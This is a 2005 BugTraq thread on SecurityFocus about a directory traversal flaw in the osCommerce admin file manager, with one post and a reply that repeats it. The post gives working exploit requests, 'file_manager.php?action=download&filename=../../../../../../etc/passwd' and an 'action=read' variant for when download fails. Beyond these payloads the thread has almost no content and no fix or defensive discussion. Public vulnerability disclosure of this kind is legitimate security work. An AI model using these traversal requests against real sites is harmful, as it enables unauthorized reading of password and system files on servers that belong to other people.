BugTraq
Back to list
|
Post reply
osCommerce File Manager Directory Traversal Vulnerability
Mar 22 2005 04:32PM
Megasky (magasky hotmail com)
(1 replies)
there is allready a post on this that have
file_manager.php?action=download&filename=../../../../../../etc/passwd
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../
[ reply ]
Re: osCommerce File Manager Directory Traversal Vulnerability
Mar 23 2005 05:48AM
Aikanáro Calaelen (aikanaro calaelen gmail com)
Privacy Statement
Copyright 2010, SecurityFocus
there is allready a post on this that have
file_manager.php?action=download&filename=../../../../../../etc/passwd
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../
[ reply ]